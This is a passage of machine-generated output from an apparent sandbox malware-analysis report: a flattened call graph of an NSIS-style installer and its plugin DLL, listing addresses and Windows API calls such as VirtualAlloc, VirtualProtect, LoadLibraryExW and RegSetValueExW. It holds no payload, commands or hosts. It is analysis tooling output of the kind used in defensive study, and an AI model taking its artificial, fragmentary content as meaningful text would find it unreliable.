calls 5245->5250 5249 100015b4 3 API calls 5246->5249 5248 1000170e 5247->5248 5251 100015b4 3 API calls 5248->5251 5252 10001731 5249->5252 5250->5253 5254 10001714 5251->5254 5255 10001272 2 API calls 5252->5255 5256 10001272 2 API calls 5254->5256 5257 10001737 GlobalFree 5255->5257 5258 1000171a GlobalFree 5256->5258 5257->5253 5259 1000174b GlobalFree 5257->5259 5258->5253 5259->5253 5260 10002238 5261 10002296 5260->5261 5262 100022cc 5260->5262 5261->5262 5263 100022a8 GlobalAlloc 5261->5263 5263->5261 4726 4026f9 4727 402700 4726->4727 4728 402972 4726->4728 4729 402b1d 18 API calls 4727->4729 4730 40270b 4729->4730 4731 402712 SetFilePointer 4730->4731 4731->4728 4732 402722 4731->4732 4734 405ed3 wsprintfW 4732->4734 4734->4728 5264 1000103d 5265 1000101b 5 API calls 5264->5265 5266 10001056 5265->5266 5267 402c7f 5268 402c91 SetTimer 5267->5268 5269 402caa 5267->5269 5268->5269 5270 402cf8 5269->5270 5271 402cfe MulDiv 5269->5271 5272 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5271->5272 5272->5270 5274 4014ff 5275 401507 5274->5275 5277 40151a 5274->5277 5276 402b1d 18 API calls 5275->5276 5276->5277 5278 401000 5279 401037 BeginPaint GetClientRect 5278->5279 5280 40100c DefWindowProcW 5278->5280 5282 4010f3 5279->5282 5283 401179 5280->5283 5284 401073 CreateBrushIndirect FillRect DeleteObject 5282->5284 5285 4010fc 5282->5285 5284->5282 5286 401102 CreateFontIndirectW 5285->5286 5287 401167 EndPaint 5285->5287 5286->5287 5288 401112 6 API calls 5286->5288 5287->5283 5288->5287 5289 401a00 5290 402b3a 18 API calls 5289->5290 5291 401a09 ExpandEnvironmentStringsW 5290->5291 5292 401a1d 5291->5292 5294 401a30 5291->5294 5293 401a22 lstrcmpW 5292->5293 5292->5294 5293->5294 5302 401b01 5303 402b3a 18 API calls 5302->5303 5304 401b08 5303->5304 5305 402b1d 18 API calls 5304->5305 5306 401b11 wsprintfW 5305->5306 5307 4029c7 5306->5307 4260 100027c7 4261 10002817 4260->4261 4262 100027d7 VirtualProtect 4260->4262 4262->4261 5308 401f08 5309 402b3a 18 API calls 5308->5309 5310 401f0f GetFileVersionInfoSizeW 5309->5310 5311 401f36 GlobalAlloc 5310->5311 5313 401f8c 5310->5313 5312 401f4a GetFileVersionInfoW 5311->5312 5311->5313 5312->5313 5314 401f59 VerQueryValueW 5312->5314 5314->5313 5315 401f72 5314->5315 5319 405ed3 wsprintfW 5315->5319 5317 401f7e 5320 405ed3 wsprintfW 5317->5320 5319->5317 5320->5313 5321 40498a 5322 4049b6 5321->5322 5323 40499a 5321->5323 5324 4049e9 5322->5324 5325 4049bc SHGetPathFromIDListW 5322->5325 5332 40574c GetDlgItemTextW 5323->5332 5327 4049d3 SendMessageW 5325->5327 5328 4049cc 5325->5328 5327->5324 5330 40140b 2 API calls 5328->5330 5329 4049a7 SendMessageW 5329->5322 5330->5327 5332->5329 5333 401c8e 5334 402b1d 18 API calls 5333->5334 5335 401c94 IsWindow 5334->5335 5336 4019f0 5335->5336 5337 1000164f 5338 10001516 GlobalFree 5337->5338 5340 10001667 5338->5340 5339 100016ad GlobalFree 5340->5339 5341 10001682 5340->5341 5342 10001699 VirtualFree 5340->5342 5341->5339 5342->5339 5343 401491 5344 405234 25 API calls 5343->5344 5345 401498 5344->5345 4528 402295 4529 402b3a 18 API calls 4528->4529 4530 4022a4 4529->4530 4531 402b3a 18 API calls 4530->4531 4532 4022ad 4531->4532 4533 402b3a 18 API calls 4532->4533 4534 4022b7 GetPrivateProfileStringW 4533->4534 4540 401f98 4541 401faa 4540->4541 4551 40205c 4540->4551 4542 402b3a 18 API calls 4541->4542 4544 401fb1 4542->4544 4543 401423 25 API calls 4545 402197 4543->4545 4546 402b3a 18 API calls 4544->4546 4547 401fba 4546->4547 4548 401fd0 LoadLibraryExW 4547->4548 4549 401fc2 GetModuleHandleW 4547->4549 4550 401fe1 4548->4550 4548->4551 4549->4548 4549->4550 4563 406362 WideCharToMultiByte 4550->4563 4551->4543 4554 401ff2 4556 402011 4554->4556 4557 401ffa 4554->4557 4555 40202b 4558 405234 25 API calls 4555->4558 4566 10001759 4556->4566 4608 401423 4557->4608 4559 402002 4558->4559 4559->4545 4561 40204e FreeLibrary 4559->4561 4561->4545 4564 40638c GetProcAddress 4563->4564 4565 401fec 4563->4565 4564->4565 4565->4554 4565->4555 4567 10001789 4566->4567 4611 10001b18 4567->4611 4569 10001790 4570 100018a6 4569->4570 4571 100017a1 4569->4571 4572 100017a8 4569->4572 4570->4559 4660 10002286 4571->4660 4643 100022d0 4572->4643 4577 1000180c 4581 10001812 4577->4581 4582 1000184e 4577->4582 4578 100017ee 4673 100024a9 4578->4673 4579 100017d7 4592 100017cd 4579->4592 4670 10002b5f 4579->4670 4580 100017be 4584 100017c4 4580->4584 4585 100017cf 4580->4585 4587 100015b4 3 API calls 4581->4587 4589 100024a9 10 API calls 4582->4589 4584->4592 4654 100028a4 4584->4654 4664 10002645 4585->4664 4594 10001828 4587->4594 4595 10001840 4589->4595 4590 100017f4 4684 100015b4 4590->4684 4592->4577 4592->4578 4598 100024a9 10 API calls 4594->4598 4607 10001895 4595->4607 4695 1000246c 4595->4695 4597 100017d5 4597->4592 4598->4595 4601 1000189f GlobalFree 4601->4570 4604 10001881 4604->4607 4699 1000153d wsprintfW 4604->4699 4605 1000187a FreeLibrary 4605->4604 4607->4570 4607->4601 4609 405234 25 API calls 4608->4609 4610 401431 4609->4610 4610->4559 4702 1000121b GlobalAlloc 4611->4702 4613 10001b3c 4703 1000121b GlobalAlloc 4613->4703 4615 10001d7a GlobalFree GlobalFree GlobalFree 4616 10001d97 4615->4616 4635 10001de1 4615->4635 4617 100020ee 4616->4617 4626 10001dac 4616->4626 4616->4635 4619 10002110 GetModuleHandleW 4617->4619 4617->4635 4618 10001c1d GlobalAlloc 4639 10001b47 4618->4639 4622 10002121 LoadLibraryW 4619->4622 4623 10002136 4619->4623 4620 10001c68 lstrcpyW 4624 10001c72 lstrcpyW 4620->4624 4621 10001c86 GlobalFree 4621->4639 4622->4623 4622->4635 4710 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4623->4710 4624->4639 4626->4635 4706 1000122c 4626->4706 4627 10002188 4629 10002195 lstrlenW 4627->4629 4627->4635 4711 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4629->4711 4630 10002148 4630->4627 4642 10002172 GetProcAddress 4630->4642 4631 10002048 4634 10002090 lstrcpyW 4631->4634 4631->4635 4634->4635 4635->4569 4636 10001cc4 4636->4639 4704 1000158f GlobalSize GlobalAlloc 4636->4704 4637 10001f37 GlobalFree 4637->4639 4638 100021af 4638->4635 4639->4615 4639->4618 4639->4620 4639->4621 4639->4624 4639->4631 4639->4635 4639->4636 4639->4637 4640 1000122c 2 API calls 4639->4640 4709 1000121b GlobalAlloc 4639->4709 4640->4639 4642->4627 4644 100022e8 4643->4644 4646 10002415 GlobalFree 4644->4646 4648 100023d3 lstrlenW 4644->4648 4649 100023ba GlobalAlloc 4644->4649 4650 1000238f GlobalAlloc WideCharToMultiByte 4644->4650 4651 1000122c GlobalAlloc lstrcpynW 4644->4651 4713 100012ba 4644->4713 4646->4644 4647 100017ae 4646->4647 4647->4579 4647->4580 4647->4592 4648->4646 4652 100023d1 4648->4652 4649->4652 4650->4646 4651->4644 4652->4646 4717 100025d9 4652->4717 4655 100028b6 4654->4655 4656 1000295b VirtualAlloc 4655->4656 4657 10002979 4656->4657 4658 10002a75 4657->4658 4659 10002a6a GetLastError 4657->4659 4658->4592 4659->4658 4661 10002296 4660->4661 4662 100017a7 4660->4662 4661->4662 4663 100022a8 GlobalAlloc 4661->4663 4662->4572 4663->4661 4665 10002661 4664->4665 4666 100026b2 GlobalAlloc 4665->4666 4667 100026c5 4665->4667 4669 100026d4 4666->4669 4668 100026ca GlobalSize 4667->4668 4667->4669 4668->4669 4669->4597 4671 10002b6a 4670->4671 4672 10002baa GlobalFree 4671->4672 4720 1000121b GlobalAlloc 4673->4720 4675 10002530 StringFromGUID2 4680 100024b3 4675->4680 4676 10002541 lstrcpynW 4676->4680 4677 1000250b MultiByteToWideChar 4677->4680 4678 10002571 GlobalFree 4678->4680 4679 10002554 wsprintfW 4679->4680 4680->4675 4680->4676 4680->4677 4680->4678 4680->4679 4681 100025ac GlobalFree 4680->4681 4682 10001272 2 API calls 4680->4682 4721 100012e1 4680->4721 4681->4590 4682->4680 4725 1000121b GlobalAlloc 4684->4725 4686 100015ba 4687 100015c7 lstrcpyW 4686->4687 4689 100015e1 4686->4689 4690 100015fb 4687->4690 4689->4690 4691 100015e6 wsprintfW 4689->4691 4692 10001272 4690->4692 4691->4690 4693 100012b5 GlobalFree 4692->4693 4694 1000127b GlobalAlloc lstrcpynW 4692->4694 4693->4595 4694->4693 4696 1000247a 4695->4696 4698 10001861 4695->4698 4697 10002496 GlobalFree 4696->4697 4696->4698 4697->4696 4698->4604 4698->4605 4700 10001272 2 API calls 4699->4700 4701 1000155e 4700->4701 4701->4607 4702->4613 4703->4639 4705 100015ad 4704->4705 4705->4636 4712 1000121b GlobalAlloc 4706->4712 4708 1000123b lstrcpynW 4708->4635 4709->4639 4710->4630 4711->4638 4712->4708 4714 100012c1 4713->4714 4715 1000122c 2 API calls 4714->4715 4716 100012df 4715->4716 4716->4644 4718 100025e7 VirtualAlloc 4717->4718 4719 1000263d 4717->4719 4718->4719 4719->4652 4720->4680 4722 100012ea 4721->4722 4723 1000130c 4721->4723 4722->4723 4724 100012f0 lstrcpyW 4722->4724 4723->4680 4724->4723 4725->4686 5360 10001058 5362 10001074 5360->5362 5361 100010dd 5362->5361 5363 10001516 GlobalFree 5362->5363 5364 10001092 5362->5364 5363->5364 5365 10001516 GlobalFree 5364->5365 5366 100010a2 5365->5366 5367 100010b2 5366->5367 5368 100010a9 GlobalSize 5366->5368 5369 100010b6 GlobalAlloc 5367->5369 5370 100010c7 5367->5370 5368->5367 5371 1000153d 3 API calls 5369->5371 5372 100010d2 GlobalFree 5370->5372 5371->5370 5372->5361 5373 401718 5374 402b3a 18 API calls 5373->5374 5375 40171f SearchPathW 5374->5375 5376 40173a 5375->5376 4962 40159b 4963 402b3a 18 API calls 4962->4963 4964 4015a2 SetFileAttributesW 4963->4964 4965 4015b4 4964->4965 5377 40149e 5378 4014ac PostQuitMessage 5377->5378 5379 40223e 5377->5379 5378->5379 5387 4021a0 5388 402b3a 18 API calls 5387->5388 5389 4021a6 5388->5389 5390 402b3a 18 API calls 5389->5390 5391 4021af 5390->5391 5392 402b3a 18 API calls 5391->5392 5393 4021b8 5392->5393 5394 4062cf 2 API calls 5393->5394 5395 4021c1 5394->5395 5396 4021d2 lstrlenW lstrlenW 5395->5396 5400 4021c5 5395->5400 5398 405234 25 API calls 5396->5398 5397 405234 25 API calls 5401 4021cd 5397->5401 5399 402210 SHFileOperationW 5398->5399 5399->5400 5399->5401 5400->5397 5400->5401 5402 100010e1 5403 10001111 5402->5403 5404 100011d8 GlobalFree 5403->5404 5405 100012ba 2 API calls 5403->5405 5406 100011d3 5403->5406 5407 100011f8 GlobalFree 5403->5407 5408 10001272 2 API calls 5403->5408 5409 10001164 GlobalAlloc 5403->5409 5410 100012e1 lstrcpyW 5403->5410 5411 100011c4 GlobalFree 5403->5411 5405->5403 5406->5404 5407->5403 5408->5411 5409->5403 5410->5403 5411->5403 5412 401b22 5413 401b73 5412->5413 5414 401b2f 5412->5414 5415 401b78 5413->5415 5416 401b9d GlobalAlloc 5413->5416 5420 401bb8 5414->5420 5421 401b46 5414->5421 5422 40223e 5415->5422 5433 405f8c lstrcpynW 5415->5433 5418 405fae 18 API calls 5416->5418 5417 405fae 18 API calls 5424 402238 5417->5424 5418->5420 5420->5417 5420->5422 5431 405f8c lstrcpynW 5421->5431 5423 401b8a GlobalFree 5423->5422 5426 405768 MessageBoxIndirectW 5424->5426 5426->5422 5427 401b55 5432 405f8c lstrcpynW 5427->5432 5429 401b64 5434 405f8c lstrcpynW 5429->5434 5431->5427 5432->5429 5433->5423 5434->5422 5435 4029a2 SendMessageW 5436 4029c7 5435->5436 5437 4029bc InvalidateRect 5435->5437 5437->5436 4109 401924 4110 401926 4109->4110 4111 402b3a 18 API calls 4110->4111 4112 40192b 4111->4112 4115 405814 4112->4115 4151 405adf 4115->4151 4118 40583c DeleteFileW 4123 401934 4118->4123 4119 405853 4120 405973 4119->4120 4165 405f8c lstrcpynW 4119->4165 4120->4123 4195 4062cf FindFirstFileW 4120->4195 4122 405879 4124 40588c 4122->4124 4125 40587f lstrcatW 4122->4125 4186 405a23 lstrlenW 4124->4186 4127 405892 4125->4127 4129 4058a2 lstrcatW 4127->4129 4131 4058ad lstrlenW FindFirstFileW 4127->4131 4129->4131 4131->4120 4149 4058cf 4131->4149 4134 405956 FindNextFileW 4138 40596c FindClose 4134->4138 4134->4149 4135 4057cc 5 API calls 4137 4059ae 4135->4137 4139 4059b2 4137->4139 4140 4059c8 4137->4140 4138->4120 4139->4123 4143 405234 25 API calls 4139->4143 4141 405234 25 API calls 4140->4141 4141->4123 4145 4059bf 4143->4145 4144 405814 64 API calls 4144->4149 4147 405e26 40 API calls 4145->4147 4147->4123 4148 405234 25 API calls 4148->4149 4149->4134 4149->4144 4149->4148 4166 405f8c lstrcpynW 4149->4166 4167 4057cc 4149->4167 4175 405234 4149->4175 4190 405e26 4149->4190 4201 405f8c lstrcpynW 4151->4201 4153 405af0 4202 405a82 CharNextW CharNextW 4153->4202 4156 405834 4156->4118 4156->4119 4157 406220 5 API calls 4163 405b06 4157->4163 4158 405b37 lstrlenW 4159 405b42 4158->4159 4158->4163 4161 4059d7 3 API calls 4159->4161 4160 4062cf 2 API calls 4160->4163 4162 405b47 GetFileAttributesW 4161->4162 4162->4156 4163->4156 4163->4158 4163->4160 4164 405a23 2 API calls 4163->4164 4164->4158 4165->4122 4166->4149 4208 405bd3 GetFileAttributesW 4167->4208 4170 4057f9 4170->4149 4171 4057e7 RemoveDirectoryW 4173 4057f5 4171->4173 4172 4057ef DeleteFileW 4172->4173 4173->4170 4174 405805 SetFileAttributesW 4173->4174 4174->4170 4176 4052f1 4175->4176 4177 40524f 4175->4177 4176->4134 4178 40526b lstrlenW 4177->4178 4179 405fae 18 API calls 4177->4179 4180 405294 4178->4180 4181 405279 lstrlenW 4178->4181 4179->4178 4183 4052a7 4180->4183 4184 40529a SetWindowTextW 4180->4184 4181->4176 4182 40528b lstrcatW 4181->4182 4182->4180 4183->4176 4185 4052ad SendMessageW SendMessageW SendMessageW 4183->4185 4184->4183 4185->4176 4187 405a31 4186->4187 4188 405a43 4187->4188 4189 405a37 CharPrevW 4187->4189 4188->4127 4189->4187 4189->4188 4211 4062f6 GetModuleHandleA 4190->4211 4194 405e4e 4194->4149 4196 405998 4195->4196 4197 4062e5 FindClose 4195->4197 4196->4123 4198 4059d7 lstrlenW CharPrevW 4196->4198 4197->4196 4199 4059f3 lstrcatW 4198->4199 4200 4059a2 4198->4200 4199->4200 4200->4135 4201->4153 4203 405a9f 4202->4203 4205 405ab1 4202->4205 4203->4205 4206 405aac CharNextW 4203->4206 4204 405ad5 4204->4156 4204->4157 4205->4204 4207 405a04 CharNextW 4205->4207 4206->4204 4207->4205 4209 4057d8 4208->4209 4210 405be5 SetFileAttributesW 4208->4210 4209->4170 4209->4171 4209->4172 4210->4209 4212 406312 LoadLibraryA 4211->4212 4213 40631d GetProcAddress 4211->4213 4212->4213 4214 405e2d 4212->4214 4213->4214 4214->4194 4215 405caa lstrcpyW 4214->4215 4216 405cd3 4215->4216 4217 405cf9 GetShortPathNameW 4215->4217 4240 405bf8 GetFileAttributesW CreateFileW 4216->4240 4218 405e20 4217->4218 4219 405d0e 4217->4219 4218->4194 4219->4218 4221 405d16 wsprintfA 4219->4221 4223 405fae 18 API calls 4221->4223 4222 405cdd CloseHandle GetShortPathNameW 4222->4218 4224 405cf1 4222->4224 4225 405d3e 4223->4225 4224->4217 4224->4218 4241 405bf8 GetFileAttributesW CreateFileW 4225->4241 4227 405d4b 4227->4218 4228 405d5a GetFileSize GlobalAlloc 4227->4228 4229 405e19 CloseHandle 4228->4229 4230 405d7c 4228->4230 4229->4218 4242 405c7b ReadFile 4230->4242 4235 405d9b lstrcpyA 4238 405dbd 4235->4238 4236 405daf 4237 405b5d 4 API calls 4236->4237 4237->4238 4239 405df4 SetFilePointer WriteFile GlobalFree 4238->4239 4239->4229 4240->4222 4241->4227 4243 405c99 4242->4243 4243->4229 4244 405b5d lstrlenA 4243->4244 4245 405b9e lstrlenA 4244->4245 4246 405ba6 4245->4246 4247 405b77 lstrcmpiA 4245->4247 4246->4235 4246->4236 4247->4246 4248 405b95 CharNextA 4247->4248 4248->4245 5438 402224 5439 40222b 5438->5439 5442 40223e 5438->5442 5440 405fae 18 API calls 5439->5440 5441 402238 5440->5441 5443 405768 MessageBoxIndirectW 5441->5443 5443->5442 5444 4051a8 5445 4051b8 5444->5445 5446 4051cc 5444->5446 5447 4051be 5445->5447 5456 405215 5445->5456 5448 4051d4 IsWindowVisible 5446->5448 5453 4051eb 5446->5453 5451 4041e6 SendMessageW 5447->5451 5449 4051e1 5448->5449 5448->5456 5457 404afe SendMessageW 5449->5457 5450 40521a CallWindowProcW 5454 4051c8 5450->5454 5451->5454 5453->5450 5462 404b7e 5453->5462 5456->5450 5458 404b21 GetMessagePos ScreenToClient SendMessageW 5457->5458 5459 404b5d SendMessageW 5457->5459 5460 404b55 5458->5460 5461 404b5a 5458->5461 5459->5460 5460->5453 5461->5459 5471 405f8c lstrcpynW 5462->5471 5464 404b91 5472 405ed3 wsprintfW 5464->5472 5466 404b9b 5467 40140b 2 API calls 5466->5467 5468 404ba4 5467->5468 5473 405f8c lstrcpynW 5468->5473 5470 404bab 5470->5456 5471->5464 5472->5466 5473->5470 5474 402729 5475 402730 5474->5475 5476 4029c7 5474->5476 5477 402736 FindClose 5475->5477 5477->5476 5478 401cab 5479 402b1d 18 API calls 5478->5479 5480 401cb2 5479->5480 5481 402b1d 18 API calls 5480->5481 5482 401cba GetDlgItem 5481->5482 5483 4024e8 5482->5483 5491 4042ae lstrcpynW lstrlenW 5492 4016af 5493 402b3a 18 API calls 5492->5493 5494 4016b5 GetFullPathNameW 5493->5494 5495 4016f1 5494->5495 5496 4016cf 5494->5496 5497 401706 GetShortPathNameW 5495->5497 5498 4029c7 5495->5498 5496->5495 5499 4062cf 2 API calls 5496->5499 5497->5498 5500 4016e1 5499->5500 5500->5495 5502 405f8c lstrcpynW 5500->5502 5502->5495 5503 404bb0 GetDlgItem GetDlgItem 5504 404c02 7 API calls 5503->5504 5511 404e1b 5503->5511 5505 404ca5 DeleteObject 5504->5505 5506 404c98 SendMessageW 5504->5506 5507 404cae 5505->5507 5506->5505 5509 404ce5 5507->5509 5510 405fae 18 API calls 5507->5510 5508 404eff 5513 404fab 5508->5513 5518 404e0e 5508->5518 5523 404f58 SendMessageW 5508->5523 5512 40419a 19 API calls 5509->5512 5514 404cc7 SendMessageW SendMessageW 5510->5514 5511->5508 5521 404afe 5 API calls 5511->5521 5537 404e8c 5511->5537 5517 404cf9 5512->5517 5515 404fb5 SendMessageW 5513->5515 5516 404fbd 5513->5516 5514->5507 5515->5516 5525 404fd6 5516->5525 5526 404fcf ImageList_Destroy 5516->5526 5534 404fe6 5516->5534 5522 40419a 19 API calls 5517->5522 5519 404201 8 API calls 5518->5519 5524 4051a1 5519->5524 5520 404ef1 SendMessageW 5520->5508 5521->5537 5538 404d07 5522->5538 5523->5518 5528 404f6d SendMessageW 5523->5528 5529 404fdf GlobalFree 5525->5529 5525->5534 5526->5525 5527 405155 5527->5518 5532 405167 ShowWindow GetDlgItem ShowWindow 5527->5532 5531 404f80 5528->5531 5529->5534 5530 404ddc GetWindowLongW SetWindowLongW 5533 404df5 5530->5533 5539 404f91 SendMessageW 5531->5539 5532->5518 5535 404e13 5533->5535 5536 404dfb ShowWindow 5533->5536 5534->5527 5546 404b7e 4 API calls 5534->5546 5549 405021 5534->5549 5555 4041cf SendMessageW 5535->5555 5554 4041cf SendMessageW 5536->5554 5537->5508 5537->5520 5538->5530 5540 404dd6 5538->5540 5543 404d57 SendMessageW 5538->5543 5544 404d93 SendMessageW 5538->5544 5545 404da4 SendMessageW 5538->5545 5539->5513 5540->5530 5540->5533 5543->5538 5544->5538 5545->5538 5546->5549 5547 40512b InvalidateRect 5547->5527 5548 405141 5547->5548 5556 404ab9 5548->5556 5550 40504f SendMessageW 5549->5550 5551 405065 5549->5551 5550->5551 5551->5547 5553 4050d9 SendMessageW SendMessageW 5551->5553 5553->5551 5554->5518 5555->5511 5559 4049f0 5556->5559 5558 404ace 5558->5527 5560 404a09 5559->5560 5561 405fae 18 API calls 5560->5561 5562 404a6d 5561->5562 5563 405fae 18 API calls 5562->5563 5564 404a78 5563->5564 5565 405fae 18 API calls 5564->5565 5566 404a8e lstrlenW wsprintfW SetDlgItemTextW 5565->5566 5566->5558 4307 402331 4308 402337 4307->4308 4309 402b3a 18 API calls 4308->4309 4310 402349 4309->4310 4311 402b3a 18 API calls 4310->4311 4312 402353 RegCreateKeyExW 4311->4312 4313 402793 4312->4313 4314 40237d 4312->4314 4315 402398 4314->4315 4316 402b3a 18 API calls 4314->4316 4317 4023a4 4315->4317 4320 402b1d 18 API calls 4315->4320 4319 40238e lstrlenW 4316->4319 4318 4023bf RegSetValueExW 4317->4318 4324 403062 4317->4324 4322 4023d5 RegCloseKey 4318->4322 4319->4315 4320->4317 4322->4313 4325 403072 SetFilePointer 4324->4325 4326 40308e 4324->4326 4325->4326 4339 40317d GetTickCount 4326->4339 4329 403139 4329->4318 4330 405c7b ReadFile 4331 4030ae 4330->4331 4331->4329 4332 40317d 43 API calls 4331->4332 4333 4030c5 4332->4333 4333->4329 4334 40313f ReadFile 4333->4334 4336 4030d5 4333->4336 4334->4329 4336->4329 4337 405c7b ReadFile 4336->4337 4338 403108 WriteFile 4336->4338 4337->4336 4338->4329 4338->4336 4340 4032e7 4339->4340 4341 4031ac 4339->4341 4342 402d1a 33 API calls 4340->4342 4352 40330f SetFilePointer 4341->4352 4344 403095 4342->4344 4344->4329 4344->4330 4345 4031b7 SetFilePointer 4347 4031dc 4345->4347 4347->4344 4350 403271 WriteFile 4347->4350 4351 4032c8 SetFilePointer 4347->4351 4353 4032f9 4347->4353 4356 406432 4347->4356 4363 402d1a 4347->4363 4350->4344 4350->4347 4351->4340 4352->4345 4354 405c7b ReadFile 4353->4354 4355 40330c 4354->4355 4355->4347 4357 406457 4356->4357 4358 40645f 4356->4358 4357->4347 4358->4357 4359 4064e6 GlobalFree 4358->4359 4360 4064ef GlobalAlloc 4358->4360 4361 406566 GlobalAlloc 4358->4361 4362 40655d GlobalFree 4358->4362 4359->4360 4360->4357 4360->4358 4361->4357 4361->4358 4362->4361 4364 402d43 4363->4364 4365 402d2b 4363->4365 4366 402d53 GetTickCount 4364->4366 4367 402d4b 4364->4367 4368 402d34 DestroyWindow 4365->4368 4369 402d3b 4365->4369 4366->4369 4371 402d61 4366->4371 4370 40632f 2 API calls 4367->4370 4368->4369 4369->4347 4370->4369 4372 402d96 CreateDialogParamW ShowWindow 4371->4372 4373 402d69 4371->4373 4372->4369 4373->4369 4378 402cfe 4373->4378 4375 402d77 wsprintfW 4376 405234 25 API calls 4375->4376 4377 402d94 4376->4377 4377->4369 4379 402d0d 4378->4379 4380 402d0f MulDiv 4378->4380 4379->4380 4380->4375 5567 404635 5568 404661 5567->5568 5569 404672 5567->5569 5628 40574c GetDlgItemTextW 5568->5628 5571 40467e GetDlgItem 5569->5571 5576 4046dd 5569->5576 5573 404692 5571->5573 5572 40466c 5575 406220 5 API calls 5572->5575 5578 4046a6 SetWindowTextW 5573->5578 5583 405a82 4 API calls 5573->5583 5574 4047c1 5625 40496f 5574->5625 5630 40574c GetDlgItemTextW 5574->5630 5575->5569 5576->5574 5580 405fae 18 API calls 5576->5580 5576->5625 5581 40419a 19 API calls 5578->5581 5579 4047f1 5584 405adf 18 API calls 5579->5584 5585 404751 SHBrowseForFolderW 5580->5585 5586 4046c2 5581->5586 5582 404201 8 API calls 5587 404983 5582->5587 5588 40469c 5583->5588 5589 4047f7 5584->5589 5585->5574 5590 404769 CoTaskMemFree 5585->5590 5591 40419a 19 API calls 5586->5591 5588->5578 5592 4059d7 3 API calls 5588->5592 5631 405f8c lstrcpynW 5589->5631 5593 4059d7 3 API calls 5590->5593 5594 4046d0 5591->5594 5592->5578 5595 404776 5593->5595 5629 4041cf SendMessageW 5594->5629 5598 4047ad SetDlgItemTextW 5595->5598 5603 405fae 18 API calls 5595->5603 5598->5574 5599 4046d6 5601 4062f6 3 API calls 5599->5601 5600 40480e 5602 4062f6 3 API calls 5600->5602 5601->5576 5610 404816 5602->5610 5604 404795 lstrcmpiW 5603->5604 5604->5598 5607 4047a6 lstrcatW 5604->5607 5605 404855 5632 405f8c lstrcpynW 5605->5632 5607->5598 5608 40485e 5609 405a82 4 API calls 5608->5609 5611 404864 GetDiskFreeSpaceW 5609->5611 5610->5605 5613 405a23 2 API calls 5610->5613 5615 4048ad 5610->5615 5614 404886 MulDiv 5611->5614 5611->5615 5613->5610 5614->5615 5616 404ab9 21 API calls 5615->5616 5626 40491e 5615->5626 5618 40490b 5616->5618 5617 40140b 2 API calls 5619 404941 5617->5619 5621 404920 SetDlgItemTextW 5618->5621 5622 404910 5618->5622 5633 4041bc KiUserCallbackDispatcher 5619->5633 5621->5626 5624 4049f0 21 API calls 5622->5624 5623 40495d 5623->5625 5634 4045ca 5623->5634 5624->5626 5625->5582 5626->5617 5626->5619 5628->5572 5629->5599 5630->5579 5631->5600 5632->5608 5633->5623 5635 4045d8 5634->5635 5636 4045dd SendMessageW 5634->5636 5635->5636 5636->5625 5637 4028b6 5638 402b1d 18 API calls 5637->5638 5639 4028bc 5638->5639 5640 4028f8 5639->5640 5641 4028df 5639->5641 5646 402793 5639->5646 5643 402902 5640->5643 5644 40290e 5640->5644 5642 4028e4 5641->5642 5650 4028f5 5641->5650 5651 405f8c lstrcpynW 5642->5651 5647 402b1d 18 API calls 5643->5647 5645 405fae 18 API calls 5644->5645 5645->5650 5647->5650 5650->5646 5652 405ed3 wsprintfW 5650->5652 5651->5646 5652->5646 5653 404337 5655 404469 5653->5655 5656 40434f 5653->5656 5654 4044d3 5657 4045a5 5654->5657 5658 4044dd GetDlgItem 5654->5658 5655->5654 5655->5657 5663 4044a4 GetDlgItem SendMessageW 5655->5663 5661 40419a 19 API calls 5656->5661 5662 404201 8 API calls 5657->5662 5659 404566 5658->5659 5660 4044f7 5658->5660 5659->5657 5668 404578 5659->5668 5660->5659 5667 40451d 6 API calls 5660->5667 5664 4043b6 5661->5664 5666 4045a0 5662->5666 5684 4041bc KiUserCallbackDispatcher 5663->5684 5665 40419a 19 API calls 5664->5665 5670 4043c3 CheckDlgButton 5665->5670 5667->5659 5671 40458e 5668->5671 5672 40457e SendMessageW 5668->5672 5682 4041bc KiUserCallbackDispatcher 5670->5682 5671->5666 5675 404594 SendMessageW 5671->5675 5672->5671 5673 4044ce 5676 4045ca SendMessageW 5673->5676 5675->5666 5676->5654 5677 4043e1 GetDlgItem 5683 4041cf SendMessageW 5677->5683 5679 4043f7 SendMessageW 5680 404414 GetSysColor 5679->5680 5681 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5679->5681 5680->5681 5681->5666 5682->5677 5683->5679 5684->5673 5685 4014b8 5686 4014be 5685->5686 5687 401389 2 API calls 5686->5687 5688 4014c6 5687->5688 4735 4015b9 4736 402b3a 18 API calls 4735->4736 4737 4015c0 4736->4737 4738 405a82 4 API calls 4737->4738 4748 4015c9 4738->4748 4739 401614 4740 401646 4739->4740 4741 401619 4739->4741 4746 401423 25 API calls 4740->4746 4744 401423 25 API calls 4741->4744 4742 405a04 CharNextW 4743 4015d7 CreateDirectoryW 4742->4743 4745 4015ed GetLastError 4743->4745 4743->4748 4747 401620 4744->4747 4745->4748 4749 4015fa GetFileAttributesW 4745->4749 4752 40163e 4746->4752 4753 405f8c lstrcpynW 4747->4753 4748->4739 4748->4742 4749->4748 4751 40162d SetCurrentDirectoryW 4751->4752 4753->4751 5689 401939 5690 402b3a 18 API calls 5689->5690 5691 401940 lstrlenW 5690->5691 5692 4024e8 5691->5692 5693 40293b 5694 402b1d 18 API calls 5693->5694 5695 402941 5694->5695 5696 402974 5695->5696 5698 40294f 5695->5698 5699 402793 5695->5699 5697 405fae 18 API calls 5696->5697 5696->5699 5697->5699 5698->5699 5701 405ed3 wsprintfW 5698->5701 5701->5699 4966 40173f 4967 402b3a 18 API calls 4966->4967 4968 401746 4967->4968 4969 405c27 2 API calls 4968->4969 4970 40174d 4969->4970 4971 405c27 2 API calls 4970->4971 4971->4970 5702 10002a7f 5703 10002a97 5702->5703 5704 1000158f 2 API calls 5703->5704 5705 10002ab2 5704->5705

                                                                                                                          Executed Functions

                                                                                                                          Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383stringfilecomCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
